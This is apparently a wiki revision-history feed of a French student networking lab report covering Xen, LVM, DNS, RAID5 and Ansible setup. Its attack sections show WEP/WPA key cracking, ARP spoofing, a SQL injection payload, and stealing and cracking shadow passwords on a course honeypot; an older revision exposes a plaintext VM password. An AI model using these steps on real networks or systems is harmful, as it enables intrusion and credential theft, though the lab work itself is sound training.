 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55149</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55149"/>
				<updated>2020-12-21T22:52:02Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous allons utiliser l'implementation open-source de DNS bind pour créer une association entre notre nom de domaine et l'ip de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54200</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54200"/>
				<updated>2020-11-30T17:23:25Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Configuration LVM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
